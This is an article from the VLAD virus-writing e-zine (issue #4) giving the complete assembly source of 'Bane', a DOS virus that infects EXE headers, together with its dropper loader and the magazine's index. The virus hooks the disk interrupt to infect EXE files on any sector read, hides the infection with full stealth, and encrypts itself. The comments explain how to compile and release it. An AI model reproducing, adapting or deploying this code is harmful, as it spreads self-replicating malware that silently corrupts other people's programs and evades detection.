Virus Labs & Distribution
VLAD #4 - Bane


;
; "Bane" - by Quantum [VLAD]
;
; Summary: This is an Exe Header virus that has
;          int 13 infection and full stealth
;          oh.. and just a little encryption :)
;
; Details: The virus code is a mere 256 bytes so it is optimised to shit,
;  and squeezed into the exe header at offset 100h .. the cs:ip is then
;  pointed to this code and the header length shortened by 100h bytes..
;  once we have execution the resident code is shoved in above the int
;  table at 20:0 and int 13 pointed to it.. after restoring all the reg's
;  we jump to ALMOST the original cs:ip.. (cs+10h:ip) where the host goes
;  on its way none the wiser.. as for the resident routine.. you may be
;  thinking all those pushes and pops are unnecessary.. you're wrong..
;  we check for a sector read.. if found we look to see if it's an exe and
;  if it's infected (tag: 10000000 in offset 12h) if not we infect it.. if
;  so we full stealth it .. after infecting it we re-write the sector (see
;  notes below) and then full stealth the sector we just infected!
;
; Testing/Compiling: This is a dropper written in A86.. make yourself
;  a little test executable called funnily enough "Test.exe" then compile
;  and run this source.. The test exe is now infected.. run it and any
;  read on a exe (including execute/streams/FCB's/etc) will infect that
;  exe.. but you won't know about it.. 'cause the "clean" sector will be
;  passed back to the reader.. The virus installation code will never
;  be run twice.. therefore there is no need for a residency checker..
;
; Known/Possible Bugs: Does not check to see if the exe header is standard
;  and thus will overwrite the bottom half of pklited exe headers..
;  also smart drive (bah!) has a habit of caching it's write to sectors and
;  not acknowledging them.. thus the full stealth still works when smartdrv
;  is running but no more files will be infected.. to make matters worse..
;  even if you turn off write caching smartdrv still screws around with the
;  writes.. them's the breaks..
;
; Dedication: This virus is dedicated to a loser I used to know.. this guy
;  was so lame he faked a robbery on his own house as an insurance scam and
;  stashed his puter at a mates place.  When it went sour and the insurance
;  wouldnt pay him (like usual) he accused his friend of stealing his
;  computer and ran to the cops.. a few months later they all went to court
;  and my friend proved his innocence and the loser got charged with fraud
;  and the judge awarded my friend the computer as compensation.

; -------------- This is the Loader (Just Ignore it) -----------------------

mov ax,virend-virstart ; I use this to keep my code under 100h bytes

push cs
push cs
pop ds
pop es

mov ax,03d02h
mov dx,offset fname
int 21h

xchg bx,ax

mov ah,3fh
mov si,offset buffer
mov dx,si
mov cx,200h
int 21h

push si
add si,14h
mov di,offset nip
movsw
movsw
add word [di-2],10h
pop si

sub word [si+8h],10h

mov word [si+12h],10h

push si
mov di,si
add di,14h
xor ax,ax
stosw
stosw
add di,100h - 18h
mov si,offset virstart
mov cx,virend-virstart
rep movsb
pop si

mov ax,04200h
xor cx,cx
cwd
int 21h

mov ah,40h
mov cx,200h
mov dx,si
int 21h

mov ah,3eh
int 21h

int 20h

; --------------- Virus starts here (Pay Attention) ------------------------

virstart:

        push ax

        push cs
        push cs
        pop ds
        pop es
        mov di,encstart-virstart
        call encdecrypt
        jmp encstart
encbyte: db 0

encdecrypt:
        mov ah,[encbyte-virstart]
        mov si,encstart-virstart
        mov cx,100h-(encstart-virstart)
encloop:
        lodsb
        xor al,ah
        stosb
        loop encloop
        ret

nip     dw 0000h    ; new ip
ncs     dw 0000h    ; new cs

encstart:

        in al,40h
        mov [encbyte-virstart],al

        mov ds,cx

        mov si,013h * 4
        push si
        mov di,offset old13i - virstart
        movsw
        movsw

        push ds
        pop es

        pop di
        mov ax,offset newint13 - virstart
        stosw
        mov ax,020h
        stosw

        push cs
        pop ds

        xor si,si
        mov di,200h
        mov cx,0100h
        rep movsb

        push cs
        pop ax

        add [offset ncs - virstart],ax

        mov ah,0dh
        int 21h

        pop ax

        xor dx,dx

        jmp dword ptr cs:[nip-virstart]

        db "[Bane]"

newint13:

        cmp ah,2
        jz infect

        db 0eah
old13i  dw 0
old13s  dw 0

infect:

        push si
        push di
        push ds
        push cx
        push es
        push bx
        push ax

        pushf
        call dword ptr cs:[offset old13i-virstart]
        mov cs:[orgax-virstart],ax
        jc nogood
        jmp tisok
nogood2me: clc
nogood:
        pop ax
        pop bx
        pop es
        pop cx
        pop ds
        pop di
        pop si
        mov ax,cs:[orgax-virstart]
        retf 2
tisok:

        cld

        push es
        pop ds

        cmp word ptr [bx],"ZM"
        jnz nogood2me
        mov ax,10h
        cmp word ptr [bx+12h],ax
        jz dostealth

        mov word ptr [bx+12h],ax

        push cs
        pop es

        lea si,[bx + 14h]
        push si
        mov di,offset nip - virstart
        add word ptr [si+2],ax
        movsw
        movsw

        sub word ptr [bx+8h],ax

        push ds
        pop es
        pop di

        xor ax,ax
        stosw
        stosw

        push cs
        pop ds

        xor si,si
        lea di,[bx+100h]
        mov cx,encstart-virstart
        rep movsb

        call encdecrypt

        pop ax
        pop bx
        pop es
        pop cx
        push cx
        push es
        push bx
        push ax

        mov ah,3
        pushf
        call dword ptr [offset old13i - virstart]

        push es
        pop ds

dostealth:

        push ds
        pop es

        lea si,[bx+ (offset nip - virstart)+100h]
        lea di,[bx+14h]
        mov ax,10h
        sub word ptr [si+2],ax
        movsw
        movsw

        add word ptr [bx+8h],ax

        xor ax,ax
        mov si,100h
        lea di,[bx+si]
        xchg cx,si
        rep stosb

        jmp nogood2me

orgax:

virend:

; ------------------------ End of Virus ------------------------------------

fname db "test.exe",0
buffer:

; ------------------------ End of Loader -----------------------------------

- VLAD #4 INDEX -
ARTICLE.0_0       Hidden Area Story By QuantumG

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

Tax Office
ARTICLE.2_2       Fight Back!
ARTICLE.2_3       Interviews
ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles

ARTICLE.3_1      

Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_6       RHINCE
ARTICLE.4_7       Tasha Yar

ARTICLE.5_1      

Replicator
ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main